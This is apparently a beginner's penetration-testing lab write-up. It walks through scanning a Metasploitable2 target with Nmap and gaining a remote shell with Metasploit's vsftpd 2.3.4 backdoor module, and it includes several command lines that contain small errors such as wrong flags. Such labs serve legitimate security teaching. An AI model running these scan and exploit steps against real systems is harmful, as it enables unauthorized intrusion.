Exploiting Metasploitable2: Nmap + Metasploit Guide

This hands-on cybersecurity lab demonstratation shows attackers combine reconnaissance and exploitation techniques using Nmap and Metasploit. The setup involves two machines: a Kali Linux attacker system equipped with penetration testing tools and a vulnerable target host (such as Metasploitable). The goal is to simulate a real-world penetration test, starting from target discovery to successful exploitation and session management.

The lab begins by verifying basic connectivity between both systems using ifconfig and ping commands. Once communication is confirmed, the attacker leverages Nmap to perform host discovery, identify open ports, and enumerate services running on the target. With detailed service information, potential vulnerabilities can be mapped to known exploits.

Next, the attacker launches Metasploit Framework (msfconsole) to load an exploit module corresponding to the vulnerable service discovered during scanning. Critical parameters such as the target IP address and service port are configured before executing the exploit. If successful, Metasploit establishes a session, often a Meterpreter shell, which allows the attacker to interact with and control the compromised system.

This exercise illustrates the importance of proactive defense, patching, and monitoring, while providing learners with practical exposure to offensive security methodologies in a safe, controlled environment.

Lab Setup & Tools Used:
Attacker PC (Kali)
Metasploit
Tools Used
Nmap 

Check Connectivity Ping From both sides.

#ifconfig(Metasploit)

#ping 192.168.142.128 (kali from Metasploit)

#ifconfig (kali)

#pin 192.168.142.130 (Metasploit on kali)

From the above exercise we have understand that he successful connection has been created. Now open nmap on kali terminal and check the version of nmap is it latest and upgraded? #nmap –version.

Yes, Nmap 7.94 is an upgraded version. It was released with several significant improvements and new features, including a migration of Zenmap and Ndiff to Python 3, enhanced OS fingerprint matching, and various library upgrades. The latest version is actually Nmap 7.96, which further builds upon these enhancements with even more performance improvements and new scripts.

NMAP SCAN ENTIRE LOCAL NETWORK
Command used

#nmap -Sv -p 21 192.168.142.130 (metasploitable)

To scan port 21 (commonly used for FTP - File Transfer Protocol) on a target system and detect the version of the service running on that port.

The above command is used to scan the Metasploitable target machine on IP 192.168.142.130, specifically focusing on port 21, which is the default port for FTP (File Transfer Protocol).

• The -sV option enables service version detection, which goes beyond simply identifying whether the port is open. It attempts to determine the exact version of the service running, such as vsftpd 2.3.4.
• The -p 21 option instructs Nmap to scan only port 21/tcp instead of scanning a full port range. This makes the scan faster and more targeted. The IP 192.168.142.130 points to the vulnerable Metasploitable machine within the lab environment.

Detect open ports

# nmap -A 21 192.168.142.130

By using the above command we can perform an aggressive scan on the target machine (192.168.142.130, Metasploitable), focusing only on port 21 (FTP).

-A → Enables aggressive scanning mode, which combines multiple Nmap features:

• Service version detection (like -sV)
• Operating system detection
• Default Nmap NSE scripts for vulnerability and service probing
• Traceroute information

-p 21 → Restricts the scan to port 21/tcp, which is the default FTP service port.

When executed, this scan not only checks whether FTP is open but also attempts to identify:

• The exact FTP software and version (e.g., vsftpd 2.3.4).
• Potential security warnings or misconfigurations.
• The operating system running on the target host.
• Additional service details using built-in Nmap scripts

Perform an aggressive scan

#nmap -A – oA  report 192.168.142.130

This command not only gathers comprehensive reconnaissance data (open ports, running services, service versions, OS details, and potential vulnerabilities) but also saves the scan in multiple formats. This is essential for penetration testers who need to:

 Document findings in reports.

 Parse results for automation or integration into other tools.

Maintain an audit trail of scans conducted.

This will:

Save results as:

report.nmap (normal)

report.xml (XML)                                                                                                 

report.gnmap (grepable)

NEXT STEP EXPLOITATION

Start msfconsole

 # search ftp

it will shows all the exploit results almost 500

next

#search vsftpd 

    We are interested in backdoor

So,

# msf6> use 1

Show Options

Set port and host

#exploit

Result:

1-Established connection between kali linux and metasploitable
2- Ping for verification
3- Check nmap –version for verification
4- Up to date
5- Perform an aggressive scan
6- With the help of msfconsole
7- Exploited metasploitable Accessed shell

Conclusion: This lab illustrates the complete life cycleof a penetration test in a controlled environment using two widely adopted tools: Nmap and Metasploit. The exercise begins with establishing basic connectivity between the attacker machine (Kali Linux) and the vulnerable target (Metasploitable), ensuring that the network setup is correct through IP verification and ping testing.

Once communication is confirmed, the attacker employs Nmap for reconnaissance. Nmap is first checked for availability, then used to conduct an aggressive scan, revealing open ports, running services, and system fingerprints. In this case, the scan identifies vulnerable services such as FTP (vsftpd 2.3.4), which is known to contain a backdoor vulnerability. This reconnaissance stage is crucial as it transforms raw network data into actionable intelligence for exploitation.

The next phase involves launching MetasploitFramework (msfconsole), a powerful exploitation toolkit. By selecting the appropriate exploit module (vsftpd_234_backdoor) and configuring target details, the attacker successfully compromises the system. Metasploit establishes a session, enabling the attacker to gain remote shell access. From here, system-level commands such as whoami or uname -a can be executed, confirming full control of the victim system.

Overall, the lab demonstrates the workflow ofdiscovery → vulnerability identification → exploitation → post-exploitation. It highlights the importance of regular patching, vulnerability management, and monitoring to prevent attackers from leveraging outdated services and known exploits to gain unauthorized access.

📂 References & Resources: 

Official Documentation: Metasploit Framework

Related Tools: Nmap Official GitHub

Example Labs & Guides: Your GitHub Repository